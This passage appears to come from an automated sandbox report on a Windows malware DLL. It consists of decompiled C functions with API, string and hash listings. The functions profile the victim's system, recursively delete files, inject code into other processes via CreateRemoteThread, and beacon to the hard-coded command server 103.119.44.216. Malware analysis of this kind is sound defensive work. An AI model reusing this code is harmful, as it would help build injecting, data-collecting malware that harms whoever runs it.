				_v292 = _v1704 / 0x3f0 / 0x3f0;
				GetLastInputInfo( &_v36);
				_t130 = GetTickCount();
				_t211 = _t130 - _v36.dwTime - 0x2bf20;
				if(_t130 - _v36.dwTime > 0x2bf20) {
					_v256 = 1;
				}
				_v592 = _a8;
				strcpy( &_v502, E10009067(_t211));
				_v588 = E10008DC9();
				lstrcpyA( &_v288, E1000ABC3());
				E10008F92( &_v572, 0x32,  &_v1384);
				lstrcpyA( &_v252, "422413711");
				_t145 =  *0x10027408; // 0x2
				if(_t145 != 0) {
					__eflags = _t145 - 1;
					if(_t145 == 1) {
						strcpy( &_v232, 0x10025070);
					}
					__eflags =  *0x10027408 - 2;
					if(__eflags == 0) {
						_push(0x1002507c);
						goto L14;
					}
				} else {
					_push(0x10025064);
					L14:
					strcpy( &_v232, ??);
				}
				_t178 = 0x3f;
				_v1124 = 0;
				_v28 = 0x100;
				memset( &_v1123, 0, _t178 << 2);
				asm("stosw");
				asm("stosb");
				GetUserNameA( &_v1124,  &_v28);
				_push( &_v1124);
				printf("%s");
				strcpy( &_v182,  &_v1124);
				return E10001B85(_t197, 0, _t214,  &_v868, 0x2f0);
			}

0x1000aed0
0x1000aeed
0x1000aef4
0x1000af06
0x1000af39
0x1000af43
0x1000af47
0x1000af4d
0x1000af56
0x1000af61
0x1000af77
0x1000af7f
0x1000af85
0x1000af8e
0x1000af93
0x1000af93
0x1000afa1
0x1000afb6
0x1000afc4
0x1000afcf
0x1000afeb
0x1000aff0
0x1000aff9
0x1000b002
0x1000b002
0x1000b012
0x1000b01f
0x1000b029
0x1000b030
0x1000b03e
0x1000b03f
0x1000b045
0x1000b04b
0x1000b051
0x1000b062
0x1000b06a
0x1000b06c
0x1000b073
0x1000b073
0x1000b076
0x1000b07f
0x1000b08e
0x1000b091
0x1000b097
0x1000b0ad
0x1000b0b3
0x1000b0bc
0x1000b0c6
0x1000b0cc
0x1000b0d5
0x1000b0da
0x1000b0dc
0x1000b0dc
0x1000b0e9
0x1000b0fc
0x1000b108
0x1000b121
0x1000b133
0x1000b147
0x1000b149
0x1000b150
0x1000b159
0x1000b15c
0x1000b16a
0x1000b170
0x1000b171
0x1000b178
0x1000b17a
0x00000000
0x1000b17a
0x1000b152
0x1000b152
0x1000b17f
0x1000b186
0x1000b18c
0x1000b191
0x1000b198
0x1000b19e
0x1000b1a5
0x1000b1a7
0x1000b1a9
0x1000b1b5
0x1000b1c1
0x1000b1c7
0x1000b1db
0x1000b1fa

APIs

wsprintfA.USER32 ref: 1000AEF4
memset.MSVCRT ref: 1000AF06
lstrlenA.KERNEL32(?,00000000), ref: 1000AF17

Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2C3
Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2D7
Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2E6
Part of subcall function 1000D28E: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 1000D2F4
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000D30C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000D31C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000D32C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000D339
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000D346
Part of subcall function 1000D28E: FreeLibrary.KERNEL32(?), ref: 1000D4D2

memset.MSVCRT ref: 1000AF47
getsockname.WS2_32(?,?,?), ref: 1000AF61

Part of subcall function 10008F48: memset.MSVCRT ref: 10008F55
Part of subcall function 10008F48: lstrlenA.KERNEL32(00000032,?,?,?,?,?,?,?,?,?,00000032,?), ref: 10008F7B
Part of subcall function 10008F48: gethostname.WS2_32(00000032,?), ref: 10008F89

GetVersionExA.KERNEL32(?), ref: 1000AFCF
GlobalMemoryStatusEx.KERNEL32(?), ref: 1000B030
CoInitialize.OLE32(00000000), ref: 1000B04B
CoCreateInstance.OLE32(1001FFB8,00000000,00000017,1001FFA8,00000001), ref: 1000B062
GetLastInputInfo.USER32 ref: 1000B0C6
GetTickCount.KERNEL32 ref: 1000B0CC

Part of subcall function 1000AD07: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 1000ADAA
Part of subcall function 1000AD07: InternetOpenUrlA.WININET(00000000,http://www.taobao.com/help/getip.php,00000000,00000000,80000000,00000000), ref: 1000ADCA
Part of subcall function 1000AD07: InternetCloseHandle.WININET(00000000), ref: 1000ADD7

strcpy.MSVCRT(?,00000000), ref: 1000B0FC

Part of subcall function 10008DC9: LoadLibraryA.KERNEL32(Ole32.dll,000003F0,?,00000000), ref: 10008DDD
Part of subcall function 10008DC9: GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 10008DED
Part of subcall function 10008DC9: GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 10008DF8
Part of subcall function 10008DC9: GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 10008E03
Part of subcall function 10008DC9: LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,1000B108), ref: 10008E0D
Part of subcall function 10008DC9: GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 10008E18

Part of subcall function 1000ABC3: FindWindowA.USER32 ref: 1000AC1F
Part of subcall function 1000ABC3: strcmp.MSVCRT ref: 1000AC40
Part of subcall function 1000ABC3: GetWindowTextA.USER32 ref: 1000AC55
Part of subcall function 1000ABC3: strlen.MSVCRT ref: 1000AC62
Part of subcall function 1000ABC3: strcpy.MSVCRT(?,?), ref: 1000AC83
Part of subcall function 1000ABC3: strcat.MSVCRT(00000000,?,?,?), ref: 1000AC96
Part of subcall function 1000ABC3: strcat.MSVCRT(00000000,10025028,00000000,?,?,?), ref: 1000ACA7
Part of subcall function 1000ABC3: GetWindow.USER32(00000000,00000002), ref: 1000ACB2
Part of subcall function 1000ABC3: GetClassNameA.USER32(00000000,?,00000104), ref: 1000ACC3
Part of subcall function 1000ABC3: CloseHandle.KERNEL32(00000000), ref: 1000ACD2
Part of subcall function 1000ABC3: strlen.MSVCRT ref: 1000ACEB

lstrcpyA.KERNEL32(?,00000000), ref: 1000B121

Part of subcall function 10008F92: memset.MSVCRT ref: 10008F9F
Part of subcall function 10008F92: lstrlenA.KERNEL32(00000032,?,?,?,?,?,?,?,?,?,00000032,?), ref: 10008FC5
Part of subcall function 10008F92: lstrcpyA.KERNEL32(00000032,10024D44,?,?,?,?,?,?,?,?,?,00000032,?), ref: 10008FD5

lstrcpyA.KERNEL32(?,422413711), ref: 1000B147
strcpy.MSVCRT(?,10025070), ref: 1000B16A
strcpy.MSVCRT(?,1002507C), ref: 1000B186
GetUserNameA.ADVAPI32(?,00000100), ref: 1000B1B5
printf.MSVCRT ref: 1000B1C7
strcpy.MSVCRT(?,?), ref: 1000B1DB

Strings

422413711, xrefs: 1000B141
%s, xrefs: 1000B1C2
Group, xrefs: 1000AF2E
SYSTEM\CurrentControlSet\Services\%s, xrefs: 1000AEE7
@, xrefs: 1000B029
Vwxyab Defghijk, xrefs: 1000AEDC

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$memset$strcpy$Library$InternetLoadWindowlstrcpylstrlen$CloseHandleNameOpenstrcatstrlen$ClassCountCreateFindFreeGlobalInfoInitializeInputInstanceLastMemoryStatusTextTickUserVersiongethostnamegetsocknameprintfstrcmpwsprintf
String ID: %s$422413711$@$Group$SYSTEM\CurrentControlSet\Services\%s$Vwxyab Defghijk
API String ID: 2011108755-3994981683
Opcode ID: 346bf3448f508aa0d7e1fd4ebdcabc74dc4c09c0d978c71f29cb802d89f20160
Instruction ID: d6b1bfb80138b5e2c63790858b9db61730b4e72f66a174e9461d5f8d5b74bd23
Opcode Fuzzy Hash: 346bf3448f508aa0d7e1fd4ebdcabc74dc4c09c0d978c71f29cb802d89f20160
Instruction Fuzzy Hash: C9911EB5900219AFEB11DBA4CC89EDEB7BCFB08340F5045A6E609E7151DB71AB85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10005B32, Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 118
fileCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E10005B32() {
				void* _t39;
				char* _t40;
				CHAR* _t42;
				CHAR* _t47;
				void* _t57;
				void* _t61;
				signed int _t62;
				intOrPtr* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t92;

				E100158AC(E1001A25A, _t88);
				_t91 = _t90 - 0x174;
				_t39 = _t88 - 0xd;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( *(_t88 + 8), _t39, _t85, _t61);
				_t62 = 0;
				 *(_t88 - 4) = 0;
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t40 = _t39 - 1;
				__imp__?at@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(_t40);
				if( *_t40 != 0x5c) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z(0x5c);
				}
				_t42 = _t88 - 0x30;
				L10019DB0();
				_t92 = _t91 + 0xc;
				 *(_t88 - 4) = 1;
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t42, _t88 - 0x20, "*.*");
				_t86 = FindFirstFileA(_t42, _t88 - 0x180);
				 *(_t88 - 4) = _t62;
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				if(_t86 != 0xffffffff) {
					_t83 = __imp___stricmp;
					do {
						if(( *(_t88 - 0x180) & 0x00000010) == 0) {
							_t47 = _t88 - 0x40;
							L10019DB0();
							_t92 = _t92 + 0xc;
							 *(_t88 - 4) = 3;
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t47, _t88 - 0x20, _t88 - 0x154);
							DeleteFileA(_t47);
							 *(_t88 - 4) = _t62;
							goto L9;
						} else {
							_push(".");
							_push(_t88 - 0x154);
							if( *_t83() != 0) {
								_push("..");
								_push(_t88 - 0x154);
								if( *_t83() != 0) {
									_t57 = _t88 - 0x30;
									L10019DB0();
									_t92 = _t92 + 0xc;
									 *(_t88 - 4) = 2;
									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t57, _t88 - 0x20, _t88 - 0x154);
									_push(_t57);
									E10005B32();
									 *(_t88 - 4) = _t62;
									L9:
									__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								}
							}
						}
					} while (FindNextFileA(_t86, _t88 - 0x180) != 0);
					FindClose(_t86);
					RemoveDirectoryA( *(_t88 + 8));
					_t62 = 1;
				}
				 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				 *[fs:0x0] =  *((intOrPtr*)(_t88 - 0xc));
				return _t62;
			}

0x10005b37
0x10005b3c
0x10005b43
0x10005b4e
0x10005b54
0x10005b59
0x10005b5c
0x10005b62
0x10005b67
0x10005b70
0x10005b77
0x10005b77
0x10005b86
0x10005b8a
0x10005b8f
0x10005b98
0x10005b9f
0x10005baf
0x10005bb1
0x10005bb4
0x10005bbd
0x10005bc4
0x10005bca
0x10005bd1
0x10005c38
0x10005c3c
0x10005c41
0x10005c46
0x10005c4a
0x10005c51
0x10005c57
0x00000000
0x10005bd3
0x10005bd9
0x10005bde
0x10005be5
0x10005bed
0x10005bf2
0x10005bf9
0x10005c06
0x10005c0a
0x10005c0f
0x10005c14
0x10005c18
0x10005c1e
0x10005c1f
0x10005c25
0x10005c5d
0x10005c5d
0x10005c5d
0x10005bf9
0x10005be5
0x10005c71
0x10005c7a
0x10005c83
0x10005c89
0x10005c8b
0x10005c8c
0x10005c93
0x10005ca0
0x10005ca8

APIs

__EH_prolog.LIBCMT ref: 10005B37
??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 10005B4E
?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 10005B5C
?at@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(-00000001), ref: 10005B67
??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(0000005C), ref: 10005B77
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,*.*), ref: 10005B8A
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 10005B9F
FindFirstFileA.KERNEL32(00000000), ref: 10005BA6
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005BB4
_strcmpi.MSVCRT ref: 10005BDF
_strcmpi.MSVCRT ref: 10005BF3
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 10005C0A
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 10005C18
??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 10005C3C
?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 10005C4A
DeleteFileA.KERNEL32(00000000), ref: 10005C51
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C5D
FindNextFileA.KERNEL32(00000000,00000010), ref: 10005C6B
FindClose.KERNEL32(00000000), ref: 10005C7A
RemoveDirectoryA.KERNEL32(?), ref: 10005C83
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 10005C93

Strings

*.*, xrefs: 10005B80

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@?c_str@?$basic_string@D@2@@0@FileFindHstd@@V10@V?$basic_string@$_strcmpi$??0?$basic_string@?at@?$basic_string@?length@?$basic_string@CloseD@1@@DeleteDirectoryFirstH_prologNextRemoveV01@Y?$basic_string@
String ID: *.*
API String ID: 1641305263-438819550
Opcode ID: 29fa325959fa382f60c7fb79bc6a25040e7bb1ed3cd0dc66dbd6b3116697d87c
Instruction ID: 4f17a47e9c71d493008e34ffe5b90871cca0c8ca80abffbb32b99e0920d08a8e
Opcode Fuzzy Hash: 29fa325959fa382f60c7fb79bc6a25040e7bb1ed3cd0dc66dbd6b3116697d87c
Instruction Fuzzy Hash: 47414D76800628EFEF01DBE4DC98EEE7BB8EF19251F454159F506E7190EB349A48CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100036A3, Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 128
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E100036A3(void* __eflags, void* _a4, void* _a8, void** _a12) {
				char _v260;
				void* _v268;
				_Unknown_base(*)()* _v272;
				_Unknown_base(*)()* _v276;
				void _v280;
				void _v534;
				char _v536;
				void* _t27;
				char _t38;
				void* _t46;
				void* _t50;
				signed int _t55;
				_Unknown_base(*)()* _t70;

				if(E10003638("SeDebugPrivilege") == 0) {
					_t27 = OpenProcess(0x1f0fff, 0, _a4);
					_a4 = _t27;
					if(_t27 == 0) {
						goto L1;
					}
					memset( &_v280, 0, 0x114);
					_v276 = GetProcAddress(LoadLibraryA("Kernel32.dll"), "OpenProcess");
					_v280 = GetProcAddress(LoadLibraryA("Kernel32.dll"), "WinExec");
					_v272 = GetProcAddress(LoadLibraryA("Kernel32.dll"), "WaitForSingleObject");
					_v268 = _a8;
					_t38 =  *0x1002697c; // 0x0
					_v536 = _t38;
					_t55 = 0x3f;
					memset( &_v534, 0, _t55 << 2);
					asm("stosb");
					GetModuleFileNameA(0,  &_v536, 0xff);
					E10003C45( &_v260, 0xff,  &_v536);
					_t46 = VirtualAllocEx(_a4, 0, 0x114, 0x3000, 0x40);
					_a8 = _t46;
					if(_t46 == 0 || WriteProcessMemory(_a4, _t46,  &_v280, 0x114, 0) == 0) {
						goto L1;
					} else {
						_t70 = VirtualAllocEx(_a4, 0, 0x1000, 0x3000, 0x40);
						if(_t70 == 0 || WriteProcessMemory(_a4, _t70, E10003583, 0x1000, 0) == 0) {
							goto L1;
						} else {
							_t50 = CreateRemoteThread(_a4, 0, 0, _t70, _a8, 0, 0);
							 *_a12 = _t50;
							return 0 | _t50 != 0x00000000;
						}
					}
				}
				L1:
				return 0;
			}

0x100036bc
0x100036cf
0x100036d7
0x100036da
0x00000000
0x00000000
0x100036eb
0x10003718
0x1000372d
0x10003738
0x10003741
0x10003747
0x1000374f
0x10003756
0x10003764
0x10003766
0x10003771
0x10003786
0x1000379f
0x100037a3
0x100037a6
0x00000000
0x100037ca
0x100037da
0x100037de
0x00000000
0x100037fa
0x10003807
0x10003810
0x00000000
0x10003819
0x100037de
0x100037a6
0x100036be
0x00000000

APIs

Part of subcall function 10003638: GetCurrentProcess.KERNEL32(00000028,?,?,?,100036B9,SeDebugPrivilege,00000000,00000000,?), ref: 10003644
Part of subcall function 10003638: OpenProcessToken.ADVAPI32(00000000,?,?,100036B9,SeDebugPrivilege,00000000,00000000,?), ref: 1000364B

OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?), ref: 100036CF
memset.MSVCRT ref: 100036EB
LoadLibraryA.KERNEL32(Kernel32.dll,OpenProcess), ref: 10003703
GetProcAddress.KERNEL32(00000000), ref: 1000370C
LoadLibraryA.KERNEL32(Kernel32.dll,WinExec), ref: 1000371E
GetProcAddress.KERNEL32(00000000), ref: 10003721
LoadLibraryA.KERNEL32(Kernel32.dll,WaitForSingleObject), ref: 10003733
GetProcAddress.KERNEL32(00000000), ref: 10003736
GetModuleFileNameA.KERNEL32(00000000,?,000000FF), ref: 10003771
VirtualAllocEx.KERNEL32(?,00000000,00000114,00003000,00000040,?,000000FF,?), ref: 1000379F
WriteProcessMemory.KERNEL32(?,00000000,?,00000114,00000000), ref: 100037C0
VirtualAllocEx.KERNEL32(?,00000000,00001000,00003000,00000040), ref: 100037D8
WriteProcessMemory.KERNEL32(?,00000000,10003583,00001000,00000000), ref: 100037F0

Strings

OpenProcess, xrefs: 100036F9
Kernel32.dll, xrefs: 100036FE
SeDebugPrivilege, xrefs: 100036AF
Kernel32.dll, xrefs: 10003713
WinExec, xrefs: 1000370E
WaitForSingleObject, xrefs: 10003723
Kernel32.dll, xrefs: 10003728

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Process$AddressLibraryLoadProc$AllocMemoryOpenVirtualWrite$CurrentFileModuleNameTokenmemset
String ID: Kernel32.dll$Kernel32.dll$Kernel32.dll$OpenProcess$SeDebugPrivilege$WaitForSingleObject$WinExec
API String ID: 2252571375-829506963
Opcode ID: e409a7c44ac41b145742f288f51afe69956024db4d5ca4d48878fe39b1f4f336
Instruction ID: 23ab21031974674d6416bb46d84a4e92be8d13489707881fa339376961ce699f
Opcode Fuzzy Hash: e409a7c44ac41b145742f288f51afe69956024db4d5ca4d48878fe39b1f4f336
Instruction Fuzzy Hash: 20415471900219BBEB229B65DC45FDB7F6CEF48790F10C065BA08E6250DB71EA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 1000AD07, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 152
networkCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000AD07(char** _a4) {
				long _v8;
				void* _v12;
				long _v16;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char* _t55;
				char* _t64;
				void* _t66;
				void* _t76;
				char* _t77;
				void* _t79;
				char* _t81;
				char* _t83;

				_v56 = 0x68;
				_v55 = 0x74;
				_v54 = 0x74;
				_v53 = 0x70;
				_v52 = 0x3a;
				_v51 = 0x2f;
				_v50 = 0x2f;
				_v49 = 0x77;
				_v48 = 0x77;
				_v47 = 0x77;
				_v46 = 0x2e;
				_v45 = 0x74;
				_v44 = 0x61;
				_v43 = 0x6f;
				_v42 = 0x62;
				_v41 = 0x61;
				_v40 = 0x6f;
				_v39 = 0x2e;
				_v38 = 0x63;
				_v37 = 0x6f;
				_v36 = 0x6d;
				_v35 = 0x2f;
				_v34 = 0x68;
				_v33 = 0x65;
				_v32 = 0x6c;
				_v31 = 0x70;
				_v30 = 0x2f;
				_v29 = 0x67;
				_v28 = 0x65;
				_v27 = 0x74;
				_v26 = 0x69;
				_v25 = 0x70;
				_v24 = 0x2e;
				_v23 = 0x70;
				_v22 = 0x68;
				_v21 = 0x70;
				_v20 = 0;
				_t76 = InternetOpenA(0, 0, 0, 0, 0);
				_v12 = _t76;
				if(_t76 == 0) {
					L12:
					return 0;
				}
				_t39 =  &_v56; // 0x68
				_t79 = InternetOpenUrlA(_t76, _t39, 0, 0, 0x80000000, 0);
				if(_t79 != 0) {
					if(InternetQueryDataAvailable(_t79,  &_v8, 0, 0) != 0) {
						_t55 = _v8 + 1;
						_push(_t55);
						L10015806();
						_t77 = _t55;
						memset(_t77, 0, _v8 + 1);
						if(InternetReadFile(_t79, _t77, _v8,  &_v16) != 0) {
							InternetCloseHandle(_t79);
							InternetCloseHandle(_v12);
							_t81 = strchr(_t77, 0x22);
							_t64 = strrchr(_t77, 0x22);
							if(_t81 == 0 || _t64 == 0) {
								L11:
								_push(_t77);
								L10015800();
								goto L12;
							} else {
								 *_t64 = 0;
								__imp__#11(_t81 + 1);
								_push(_t77);
								_t83 = _t64;
								L10015800();
								if(_t83 == 0xffffffff) {
									goto L11;
								}
								 *_a4 = _t83;
								_t66 = 1;
								return _t66;
							}
						}
						_push(_t77);
						L10015800();
						InternetCloseHandle(_t79);
						InternetCloseHandle(_v12);
						goto L12;
					}
					InternetCloseHandle(_t79);
					InternetCloseHandle(_t76);
					goto L12;
				}
				InternetCloseHandle(_t76);
				goto L12;
			}

0x1000ad17
0x1000ad1b
0x1000ad1f
0x1000ad23
0x1000ad27
0x1000ad2b
0x1000ad2f
0x1000ad33
0x1000ad37
0x1000ad3b
0x1000ad3f
0x1000ad43
0x1000ad47
0x1000ad4b
0x1000ad4f
0x1000ad53
0x1000ad57
0x1000ad5b
0x1000ad5f
0x1000ad63
0x1000ad67
0x1000ad6b
0x1000ad6f
0x1000ad73
0x1000ad77
0x1000ad7b
0x1000ad7f
0x1000ad83
0x1000ad87
0x1000ad8b
0x1000ad8f
0x1000ad93
0x1000ad97
0x1000ad9b
0x1000ad9f
0x1000ada3
0x1000ada7
0x1000adb0
0x1000adb4
0x1000adb7
0x1000aea0
0x00000000
0x1000aea0
0x1000adc4
0x1000add0
0x1000add4
0x1000adf1
0x1000ae07
0x1000ae08
0x1000ae09
0x1000ae0e
0x1000ae17
0x1000ae31
0x1000ae51
0x1000ae56
0x1000ae64
0x1000ae66
0x1000ae71
0x1000ae99
0x1000ae99
0x1000ae9a
0x00000000
0x1000ae77
0x1000ae78
0x1000ae7b
0x1000ae81
0x1000ae82
0x1000ae84
0x1000ae8d
0x00000000
0x00000000
0x1000ae94
0x1000ae96
0x00000000
0x1000ae96
0x1000ae71
0x1000ae33
0x1000ae34
0x1000ae41
0x1000ae46
0x00000000
0x1000ae46
0x1000adfa
0x1000adfd
0x00000000
0x1000adfd
0x1000add7
0x00000000

APIs

InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 1000ADAA
InternetOpenUrlA.WININET(00000000,http://www.taobao.com/help/getip.php,00000000,00000000,80000000,00000000), ref: 1000ADCA
InternetCloseHandle.WININET(00000000), ref: 1000ADD7
InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000), ref: 1000ADE9
InternetCloseHandle.WININET(00000000), ref: 1000ADFA
InternetCloseHandle.WININET(00000000), ref: 1000ADFD

Strings

http://www.taobao.com/help/getip.php, xrefs: 1000ADC4, 1000ADC8

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Internet$CloseHandle$Open$AvailableDataQuery
String ID: http://www.taobao.com/help/getip.php
API String ID: 219348458-1248767277
Opcode ID: ce5e5f29b130eb51231f3862a2915433f1c92e45aa1c71e1f45e55b002b98ca3
Instruction ID: da8b29c6210d8c9c6febb16ec201db75df88c9af03c191a80cf2f68b85fcf42d
Opcode Fuzzy Hash: ce5e5f29b130eb51231f3862a2915433f1c92e45aa1c71e1f45e55b002b98ca3
Instruction Fuzzy Hash: 08517920C081D9DEFB02D7B8C848BEEBFB99F16788F140159E44077292C7BA5A59C776

Uniqueness

Uniqueness Score: -1.00%

Function 1000B281, Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 147
synchronizationsleepstringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000B281(void* __ecx, void* __eflags, void* __fp0) {
				long _t58;
				long _t65;
				long _t66;
				long _t67;
				long _t76;
				signed int _t87;
				intOrPtr _t104;
				void* _t110;
				void* _t111;
				void* _t113;
				long _t120;
				void* _t122;

				_t122 = __fp0;
				E100158AC(E1001A4AB, _t111);
				E100158E0(0x1174, __ecx);
				E10002D28();
				if( *0x10027598 == 1) {
					wsprintfA(_t111 - 0x1d0, "%s:%d:%s", "103.119.44.216",  *0x10027150, "Vwxyab Defghijk");
					_t113 = _t113 + 0x14;
					_t110 = CreateMutexA(0, 0, _t111 - 0x1d0);
					if(_t110 != 0) {
						_t76 = GetLastError();
						_t118 = _t76 - 0xb7;
						if(_t76 == 0xb7) {
							ReleaseMutex(_t110);
							CloseHandle(_t110);
							ExitProcess(0);
						}
					}
				}
				SetUnhandledExceptionFilter(E1000B225);
				SetThreadPriority(GetCurrentThread(), 0x80);
				E10001603(_t111 - 0x6c, _t118);
				 *(_t111 - 4) = 0;
				 *((char*)(_t111 - 0xd)) = 0;
				L5:
				L5:
				if( *((intOrPtr*)(_t111 - 0xd)) != 0) {
					Sleep(0x1770);
				}
				_t120 =  *0x100275b0; // 0x0
				if(_t120 != 0) {
					goto L18;
				}
				_t87 = 0x3f;
				 *(_t111 - 0x16c) = 0;
				memset(_t111 - 0x16b, 0, _t87 << 2);
				_t113 = _t113 + 0xc;
				asm("stosw");
				asm("stosb");
				_t104 =  *0x10027150; // 0x1f91
				lstrcatA(_t111 - 0x16c, "103.119.44.216");
				if(strcmp(_t111 - 0x16c, 0x100275b8) != 0) {
					 *((intOrPtr*)(_t111 - 0x14)) = GetTickCount();
					__eflags = E10001736(_t111 - 0x6c, __eflags, _t111 - 0x16c, _t104);
					if(__eflags == 0) {
						goto L9;
					} else {
						_t58 = GetTickCount();
						E10008144(_t111 - 0x1180, __eflags, _t111 - 0x6c, _t111 - 0x16c, _t104);
						 *(_t111 - 4) = 1;
						E10001D91(_t111 - 0x6c, _t111 - 0x1180);
						_t65 = E1000AED0(_t122, _t111 - 0x6c, _t58 -  *((intOrPtr*)(_t111 - 0x14)));
						__eflags = _t65;
						if(_t65 > 0) {
							while(1) {
								_t66 = WaitForSingleObject( *(_t111 - 0x20), 0x64);
								Sleep(0x1f4);
								_t67 =  *0x100275b0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								__eflags = _t67;
								if(_t67 == 0) {
									continue;
								}
								break;
							}
							__eflags = _t67;
							if(_t67 != 0) {
								E10001B2C(_t111 - 0x6c);
								 *(_t111 - 4) = 0;
